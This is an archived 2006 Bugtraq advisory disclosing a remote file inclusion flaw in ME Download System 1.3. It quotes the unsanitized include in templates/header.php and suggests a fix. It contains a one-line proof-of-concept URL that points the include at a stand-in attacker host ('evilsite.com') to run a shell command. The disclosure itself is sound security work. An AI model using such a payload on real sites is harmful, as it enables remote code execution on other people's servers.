| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 3 Aug 2006 18:49:43 -0000 From: philipp.niedziela@....de To: bugtraq@...urityfocus.com Subject: ME Download System 1.3 Remote File Inclusion +-------------------------------------------------------------------- + + ME Download System 1.3 Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: ME Download System 1.3 + Venedor ...........: http://www.ehmig.net/ + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: Philipp Niedziela + Original advisory .: http://www.bb-pcsecurity.de/sicherheit_282.htm + Contact ...........: webmaster[at]bb-pcsecurity[.]de http://www.bb-pcsecurity.de + Affected Files ....: templates/header.php + +-------------------------------------------------------------------- + + Code of /templates/header.php: + + ..... + <?php + include($Vb8878b936c2bd8ae0cab.'/settings_style.php'); + ..... + +-------------------------------------------------------------------- + + $Vb8878b936c2bd8ae0cab is not properly sanitized before being used + +-------------------------------------------------------------------- + + Solution: + Include config-File in header.php: + +-------------------------------------------------------------------- + + PoC: + http://[target]/templates/header.php?$Vb8878b936c2bd8ae0cab=http://evilsite.com?cmd=ls + +-------------------------------------------------------------------- + + Notice: + Maybe there are more RFI-Vulns in other files, but it's very hard + to read this code. + + Venedor has been contacted, but I didn't received any answer. + +-------------------------------------------------------------------- + + Greets: + Krini Gonzales + +-------------------------[ E O F ]----------------------------------
Powered by blists - more mailing lists